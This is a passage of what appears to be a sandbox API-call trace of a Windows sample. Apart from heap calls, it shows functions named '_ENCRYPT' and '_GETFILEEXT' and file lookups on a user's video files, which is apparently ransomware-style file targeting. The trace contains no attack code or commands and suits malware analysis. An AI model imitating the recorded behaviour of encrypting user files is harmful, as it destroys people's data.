hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.811] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0196.811] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0196.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0196.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0196.812] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.813] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0196.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0196.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9fd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0196.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.814] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0196.814] CloseHandle (hObject=0x158) returned 1 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0196.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0196.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.815] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.815] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0196.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0196.816] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0196.816] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0196.816] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.816] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0196.816] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.816] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0196.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0196.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.817] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.817] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.817] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x7b3a1a70, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 0x90add8 [0196.817] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0196.817] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.817] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x7b3a1a70, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 0x90add8 [0196.817] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0196.817] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", 